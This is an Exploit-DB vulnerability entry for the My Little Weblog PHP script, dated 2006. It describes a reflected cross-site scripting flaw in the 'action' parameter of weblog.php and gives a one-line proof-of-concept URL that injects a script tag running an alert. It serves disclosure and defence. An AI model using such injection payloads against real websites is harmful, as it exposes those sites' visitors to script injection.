My Little Weblog 2006.11.21 - 'Weblog.php' Cross-Site Scripting

EDB-ID:

29162




Platform:

PHP

Date:

2006-11-21


source: https://www.securityfocus.com/bid/21238/info

My Little Weblog is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'action' parameter of the 'weblog.php' script.

www.example.com/weblog.php?action="><script>alert('XSS')</script><